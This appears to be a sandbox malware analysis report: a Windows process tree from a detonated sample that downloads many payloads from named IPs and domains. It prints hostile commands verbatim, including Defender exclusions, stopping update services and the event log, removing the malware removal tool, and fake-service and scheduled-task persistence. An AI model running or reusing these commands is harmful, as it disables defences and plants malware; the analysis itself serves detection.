C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe"C:\Users\Admin\AppData\Local\Temp\3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe"2⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe"C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1677919094.exeC:\Users\Admin\AppData\Local\Temp\1677919094.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Local\Temp\http185.215.113.66newtpp.exe.exe"C:\Users\Admin\AppData\Local\Temp\http185.215.113.66newtpp.exe.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\sysppvrdnvs.exeC:\Windows\sysppvrdnvs.exe4⤵
- Modifies security service
- Windows security bypass
- Checks computer location settings
- Executes dropped EXE
- Windows security modification
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\sc.exesc stop wuauserv6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\sc.exesc stop DoSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\sc.exesc stop BITS /wait6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Local\Temp\1372228982.exeC:\Users\Admin\AppData\Local\Temp\1372228982.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1240923462.exeC:\Users\Admin\AppData\Local\Temp\1240923462.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpcache.ussc.orgcss67065a0933c9e_UUESUpdater.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpcache.ussc.orgcss67065a0933c9e_UUESUpdater.exe.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\EdgeUpdater\UUSIService.exe"C:\Users\Admin\AppData\Local\Temp\EdgeUpdater\UUSIService.exe"4⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe"C:\Users\Admin\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe" --checker5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\http154.216.19.160txtUm9L61WgOApLFKJ.exe.exe"C:\Users\Admin\AppData\Local\Temp\http154.216.19.160txtUm9L61WgOApLFKJ.exe.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\http154.216.19.160txtUm9L61WgOApLFKJ.exe.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\http154.216.19.160txtUm9L61WgOApLFKJ.exe.exe"C:\Users\Admin\AppData\Local\Temp\http154.216.19.160txtUm9L61WgOApLFKJ.exe.exe"4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\http154.216.19.160txtUm9L61WgOApLFKJ.exe.exe"C:\Users\Admin\AppData\Local\Temp\http154.216.19.160txtUm9L61WgOApLFKJ.exe.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "DHCP Host" /xml "C:\Users\Admin\AppData\Local\Temp\tmp3EF8.tmp"5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "DHCP Host Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp4199.tmp"5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\http154.216.19.160txtaeGTitPRCz9BKKQ.exe.exe"C:\Users\Admin\AppData\Local\Temp\http154.216.19.160txtaeGTitPRCz9BKKQ.exe.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\http154.216.19.160txtaeGTitPRCz9BKKQ.exe.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\http154.216.19.160txtaeGTitPRCz9BKKQ.exe.exe"C:\Users\Admin\AppData\Local\Temp\http154.216.19.160txtaeGTitPRCz9BKKQ.exe.exe"4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\AppData\Local\Temp\http87.120.84.38txttIelklVKfumqUfa.exe.exe"C:\Users\Admin\AppData\Local\Temp\http87.120.84.38txttIelklVKfumqUfa.exe.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\http87.120.84.38txttIelklVKfumqUfa.exe.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\http87.120.84.38txttIelklVKfumqUfa.exe.exe"C:\Users\Admin\AppData\Local\Temp\http87.120.84.38txttIelklVKfumqUfa.exe.exe"4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpproxy.siteterbaru.xyzcss0a839761915d.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpproxy.siteterbaru.xyzcss0a839761915d.exe.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3316 -s 3004⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\http146.70.24.213do1654365431.exe.exe"C:\Users\Admin\AppData\Local\Temp\http146.70.24.213do1654365431.exe.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\http185.215.113.2058080markdef.exe.exe"C:\Users\Admin\AppData\Local\Temp\http185.215.113.2058080markdef.exe.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\http185.215.113.103offrandom.exe.exe"C:\Users\Admin\AppData\Local\Temp\http185.215.113.103offrandom.exe.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\http185.215.113.103offdef.exe.exe"C:\Users\Admin\AppData\Local\Temp\http185.215.113.103offdef.exe.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\http185.215.113.100offdef.exe.exe"C:\Users\Admin\AppData\Local\Temp\http185.215.113.100offdef.exe.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\http185.215.113.100offrandom.exe.exe"C:\Users\Admin\AppData\Local\Temp\http185.215.113.100offrandom.exe.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\httpeficienciaeningenieria.com.mxvnklng5th.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpeficienciaeningenieria.com.mxvnklng5th.exe.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Local\Temp\httpeficienciaeningenieria.com.mxvnklng5th.exe.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpproxy.amazonscouts.comrevada67040a97a73fb_workApp.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpproxy.amazonscouts.comrevada67040a97a73fb_workApp.exe.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\InformationCheck.exe"C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au35⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpeficienciaeningenieria.com.mxngqwplngown.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpeficienciaeningenieria.com.mxngqwplngown.exe.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Local\Temp\httpeficienciaeningenieria.com.mxngqwplngown.exe.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpeficienciaeningenieria.com.mxnwaplvnggeejan22.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpeficienciaeningenieria.com.mxnwaplvnggeejan22.exe.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Local\Temp\httpeficienciaeningenieria.com.mxnwaplvnggeejan22.exe.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4340 -s 7364⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\http46.8.229.59thebiggetlab.exe.exe"C:\Users\Admin\AppData\Local\Temp\http46.8.229.59thebiggetlab.exe.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\is-GDE30.tmp\is-A504O.tmp"C:\Users\Admin\AppData\Local\Temp\is-GDE30.tmp\is-A504O.tmp" /SL4 $B01F6 "C:\Users\Admin\AppData\Local\Temp\http46.8.229.59thebiggetlab.exe.exe" 3941678 522244⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Middle Media Player\middlemediaplayer32.exe"C:\Users\Admin\AppData\Local\Middle Media Player\middlemediaplayer32.exe" -i5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\http87.120.84.38txtfWAcz73TNXEbaJ2.exe.exe"C:\Users\Admin\AppData\Local\Temp\http87.120.84.38txtfWAcz73TNXEbaJ2.exe.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\http87.120.84.38txtfWAcz73TNXEbaJ2.exe.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\http87.120.84.38txtfWAcz73TNXEbaJ2.exe.exe"C:\Users\Admin\AppData\Local\Temp\http87.120.84.38txtfWAcz73TNXEbaJ2.exe.exe"4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpmkas.rizwanmano.comlopsa67057a2256a25_SwiftKey.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpmkas.rizwanmano.comlopsa67057a2256a25_SwiftKey.exe.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\InformationCheck.exe"C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au35⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\http185.215.113.26JavUmar.exe.exe"C:\Users\Admin\AppData\Local\Temp\http185.215.113.26JavUmar.exe.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
-
C:\Users\Admin\AppData\Local\Temp\service123.exe"C:\Users\Admin\AppData\Local\Temp\service123.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Users\Admin\AppData\Local\Temp\http154.12.82.11808win.exe.exe"C:\Users\Admin\AppData\Local\Temp\http154.12.82.11808win.exe.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\http103.130.147.211Filesjgt.exe.exe"C:\Users\Admin\AppData\Local\Temp\http103.130.147.211Filesjgt.exe.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"4⤵
- Launches sc.exe
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpmkas.rizwanmano.comprog66b837290469c_vidar.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpmkas.rizwanmano.comprog66b837290469c_vidar.exe.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & rd /s /q "C:\ProgramData\BFHJECAAAFHI" & exit5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\timeout.exetimeout /t 106⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpmkas.rizwanmano.comrevada66af9bdbf0f60_Team.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpmkas.rizwanmano.comrevada66af9bdbf0f60_Team.exe.exe"3⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\Admin\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit2⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Public\jsc.exeC:\Users\Public\jsc.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Public\jsc.exeC:\Users\Public\jsc.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3316 -ip 33162⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4340 -ip 43402⤵
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\ProgramData\Google\Chrome\updater.exeC:\ProgramData\Google\Chrome\updater.exe1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
-
-
-
